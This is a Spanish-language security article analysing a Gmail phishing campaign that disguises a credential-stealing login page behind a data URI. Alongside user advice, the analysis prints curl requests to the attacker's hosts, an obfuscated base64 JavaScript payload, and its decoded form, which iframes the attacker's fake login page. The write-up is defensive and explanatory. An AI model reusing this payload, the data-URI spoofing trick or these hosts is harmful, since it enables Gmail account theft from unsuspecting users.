Técnica de Phishing sobre Gmail

El último intento de phishing que se está distribuyendo en Gmail imita de forma tan exacta la página de correo de Google que los expertos en seguridad han hecho saltar todas las alarmas.Si durante estos días recibes un correo electrónico con un archivo PDF adjunto que, tras pulsarlo, te redirige al inicio de sesión de Google, bajo ningún concepto introduzcas tus datos. Aunque la URL parezca confiable, no lo es. El método es usar Data Uri en la barra de direcciones del navegador para que no muestra ningún error de certificado SSL/TLS y aparezca el subdominio accounts.google.com en la barra aunque no sea seguido de https.

En una nueva campaña del llamado phishing, un grupo de hackers ha comenzado a distribuir un correo electrónico infectado cuya única intención pasa por robar las cuentas de Gmail de las víctimas. El correo esconde una imagen que a primera vista parece un archivo adjunto, pero cuando el usuario pulsa sobre el fichero es automáticamente redirigido a una página que simula el aspecto del inicio de sesión de Gmail.
Por supuesto, la página a la que redirige el correo es una completa y total estafa. El aspecto de la página es idéntico al que tiene la web oficial para iniciar sesión en Gmail, pero a poco que nos fijemos en la barra de dirección URL veremos que antes del enlace de accounts.google.com aparece el texto de “data:text/html,“. Si vemos eso, significa que estamos a punto de caer en el robo de la cuenta.

data:text/html,https://accounts/google.com

Aspecto del Phishing de Gmail

El aspecto que luce esta estafa de Gmail es exactamente el que se puede ver en la captura de pantalla que adjuntamos a continuación. A primera vista parece que se trata de la página oficial de Google para el inicio de sesión, pero basta con fijarnos en la URL para darnos cuenta de que hay algo que no está en orden.

Todo aquel que cae en la trampa no solamente se expone a perder el acceso a su cuenta de Gmail, sino que además debe enfrentarse al hecho de que todos los contactos con los que haya intercambiado algún mensaje en su correo electrónico recibirán esta misma estafa en su propio nombre. De hecho, ahí reside precisamente el mayor peligro de este engaño: el correo infectado lo envían nuestros propios contactos, quienes sin saberlo a su vez han sido antes infectados por otra víctima.

Entonces, ¿cómo protegernos de esta nueva estafa? Tan sencillo como revisar muy bien la página en la que introducimos nuestro correo electrónico, y no dejarnos llevar nunca solamente por la interfaz. Hay que revisar siempre la URL de la página en la que se está iniciando sesión, y en todos los casos hay que comprobar que se trate de una web que tiene el certificado HTTPS.

En todos estos ataques, lo que normalmente ocasiona el robo de las cuentas es la falta de seguridad por parte de los usuarios. Tanto esta campaña de robo de cuentas de Gmail como muchas otras que inevitablemente irán llegando en los próximos meses se pueden evitar por completo añadiendo los ajustes de seguridad que recomienda Google, especialmente el referido a la verificación en dos pasos.

Esta técnica de phishing utiliza algo llamado “URI de datos” para incluir un archivo completo en la barra de localización del navegador. Cuando miras hacia arriba en la barra de localización del navegador y ver ‘data: text / html … ..’ que en realidad es una cadena de texto muy larga. Si amplías la barra de direcciones verás que hay un montón de espacios en blanco que he eliminado. Pero en la extrema derecha se puede ver el comienzo de lo que es un pedazo muy grande de texto. En realidad, este es un archivo que se abre en una nueva pestaña y crea una página de inicio de sesión de Gmail falsa completamente funcional que envía sus credenciales al atacante.

Como se puede ver en la parte izquierda de la barra de localización del navegador, en lugar de “https”, tiene “data: text / html” seguido del habitual “https: //accounts.google.com …”. Si no estás prestando mucha atención, ignorarás el preámbulo ‘data: text / html’ y asumirás que la URL es segura.

URL Falsa:

La URL correcta debe ser:

Análisis del Phishing

Recibes un adjunto con un supuesto PDF:

Para abrirlo aparece que tienes que iniciar sesión en Google:

La falsa imagen del adjunto está enlazada a: http://x5.to/A78

ƒ curl -vvvv http://x5.to/A78
*   Trying 112.78.125.184...
* Connected to x5.to (112.78.125.184) port 80 (#0)
> GET /A78 HTTP/1.1
> Host: x5.to
> User-Agent: curl/7.43.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Date: Fri, 11 Mar 2016 11:38:08 GMT
< Server: Apache/2.2.31
< Location: http://bowlanreedesntal.top/services/aboutus.htm

El error 301 redirecciona a un meta tag de refresco para poner la página del data/url usando una codificación en base64 , usando data/text:html en la URL:

ƒ curl http://bowlanreedesntal.top/services/aboutus.htm
<meta http-equiv="Refresh" content="0; url=data:text/html,
https://accounts.google.com/ServiceLogin?service=mail                                                                                                                                                                                                                                    src="data:text/html;base64,ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7d2hpbGUoYy0tKXtpZihrW2NdKXtwPXAucmVwbGFj</span">
ZShuZXcgUmVnRXhwKCdcXGInK2MrJ1xcYicsJ2cnKSxrW2NdKX19cmV0dXJuIHB9KCczLjIuMTg9
IjE3IDE2IDE5IDIwIDIyIjsyMXsoMTUoKXsxNCAxPTMuMi45KFwnMVwnKTsxLjg9XCc3LzEwLTRc
JzsxLjExPVwnMTMgNFwnOzEuMjM9XCdcJzsyLjI0KFwnMzZcJylbMF0uMzUoMSl9KCkpfTM3KDM4
KXt9My4yLjMzLjMyPSI8NiAyNz1cXCIyNjovLzI1LjI4LzI5LzMxLjMwXFwiIDM5PVxcIjQwOiAw
OzM0OiA1JTsxMjo1JVxcIj48LzY+IjsnLDEwLDQxLCd8bGlua3xkb2N1bWVudHx3aW5kb3d8aWNv
bnwxMDB8aWZyYW1lfGltYWdlfHR5cGV8Y3JlYXRlRWxlbWVudHx4fHJlbHxoZWlnaHR8c2hvcnRj
dXR8dmFyfGZ1bmN0aW9ufGhhdmV8WW91fHRpdGxlfGJlZW58U2lnbmVkfHRyeXxvdXR8aHJlZnxn
ZXRFbGVtZW50c0J5VGFnTmFtZXxib3dsYW5yZWVkZXNudGFsfGh0dHB8c3JjfHRvcHxzZXJ2aWNl
c3xodG1sfGNvbnRhY3R1c3xvdXRlckhUTUx8Ym9keXx3aWR0aHxhcHBlbmRDaGlsZHxoZWFkfGNh
dGNofGV8c3R5bGV8Ym9yZGVyJy5zcGxpdCgnfCcpKSkK>"

El código Base64 resulta ser código JavaScript:

window.document.title = "You have been Signed out";
try {
    (function() {
        var link = window.document.createElement('link');
        link.type = 'image/x-icon';
        link.rel = 'shortcut icon';
        link.href = '';
        document.getElementsByTagName('head')[0].appendChild(link)
    }())
} catch (e) {}
window.document.body.outerHTML = "iframe src=\"http://bowlanreedesntal.top/services/
contactus.html\" style=\"border: 0;width: 100%;height:100%\">/iframe>";